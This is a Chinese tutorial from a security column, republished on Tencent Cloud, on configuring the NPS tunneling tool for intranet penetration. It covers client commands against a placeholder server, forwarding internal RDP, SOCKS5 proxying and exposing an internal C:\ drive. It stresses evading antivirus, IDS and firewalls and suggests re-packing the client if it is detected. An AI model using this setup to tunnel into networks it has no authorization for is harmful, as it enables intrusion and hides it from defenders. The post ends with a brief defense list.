首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >NPS详情

NPS详情

作者头像
安恒网络空间安全讲武堂
发布2019-09-19 11:09:59
3.4K1
发布2019-09-19 11:09:59
举报

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.2

好用在哪?

使用方便

直接在server web中进行配置即可。

功能丰富

tcp/udp隧道端口转发、socks5/http内网代理、内网文件访问服务、p2p、域名解析(暂用不到)。

过杀软

client目前还是过杀毒静态检测的。

数据压缩

所有模式均支持snnapy形式的数据压缩,压缩后的流量有一定的绕过内网ips、ids、apt设备的能力。可通过配置文件设置。

tls加密传输

通信内容tls加密传输,有一定的绕过防火墙流量屏蔽与协议屏蔽的能力。可通过配置文件设置。

流畅

数据传输中经过snnapy压缩,数据体积减小,client配置auto_reconnection后,连接中断后可自动重新建立连接,一定程度避免一些代理工具代理缓慢、连接中断问题。

长久性

代码开源,客户端即便被杀了,还可以改改代码、加加壳绕一绕。@liu 在维护项目,期待更多功能上线。

No.3

服务端配置

nps server启动

服务端运行nps test,无报错后nps start启动服务端。

nps server添加client

随便填就行,client config文件用得到,socks5、http代理时候需要用到basic认证帐号密码。

client状态:

得到客户端启动命令:

./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp

No.4

客户端配置

客户端启动配置两种:无配置文件、有配置文件。其一即可。

注:server ip 以x.x.x.x代替。

无配置文件启动

使用./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp命令启动即可。

360两件套对npc.exe文件和tcp连接无告警。

获取到客户端连接。

有配置文件启动

使用./npc -config=npc config file加载配置文件启动。

全局配置项:

[common]

server_addr=x.x.x.x:8024

# server中监听地址和端口

conn_type=tcp

vkey=adminkey

# server配置的客户端密钥

auto_reconnection=true

# 断线重连,比较好用

max_conn=1000

flow_limit=1000

rate_limit=1000

basic_username=admink

# server配置的basic用户名,用于http、socks5代理认证basic_password=admink

# server配置的basic密码,用于http、socks5代理认证web_username=user

# web登录帐号,这个不用了

web_password=1234

# web登录密码,这个也不用了

crypt=true

# 是否加密传输

compress=true

# 是否压缩传输

No.5

TCP/UDP隧道配置

TCP隧道

两种配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加tcp隧道:

隧道建立后,连接server ip x.x.x.x的7000端口,即连接到内网172.16.58.145的3389端口。

net 连接:

2、client config文件配置

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

crypt=true

compress=true

[tcp]

mode=tcp

target_addr=172.16.58.145:3389

server_port=7000

client 的config文件无法重载,故,只能启动时候加载上所有配置,不建议用config文件方式进行隧道配置,不灵活,推荐使用server web配置方式。

UDP隧道

UDP隧道配置和TCP过程一样,mode改成UDP即可。

No.6

socks5/http内网代理

socks5内网代理

两种配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加socks5:

代理设置完毕后,连接server ip x.x.x.x的9000端口即可代理到内网中。

在nps server添加client时,设置了basic权限认证admink/admink,部分浏览器插件如SwitchyOmega不支持s5的basic认证,建议使用proxychains进行代理。

proxychains配置:

socks5x.x.x.x9000adminkadmink

代理web:

代理rdp:

net 连接:

2、client config文件配置

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=true

compress=true

[socks5]

mode=socks5

server_port=9000

client 的config文件无法重载,故,只能启动时候加载上所有配置,不建议用config文件方式进行socks5代理配置,不灵活,推荐使用server web配置方式。

http内网代理

http内网代理和socks5过程一样,mode改成httpProxy即可。

No.7

内网文件访问服务

内网文件访问配置只能在client config中进行。

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=truecompress=true

[file]mode=file

server_port=8888

local_path=C:\\

strip_pre=/fileservice/

ocal_path配置内网机要设置文件服务的目录。

server_port配置一个server ip上的端口。

strip_pre配置访问文件服务的path。

成功启动:

浏览器中访问:http://x.x.x.x:8888/fileservice/

目前只能做文件访问,还做不到文件管理。

No.8

防御方案

  1. 加强内网攻击检测
  2. 部署apt设备和蜜罐设备
  3. 捕捉内网攻击行为

END

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 恒星EDU 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档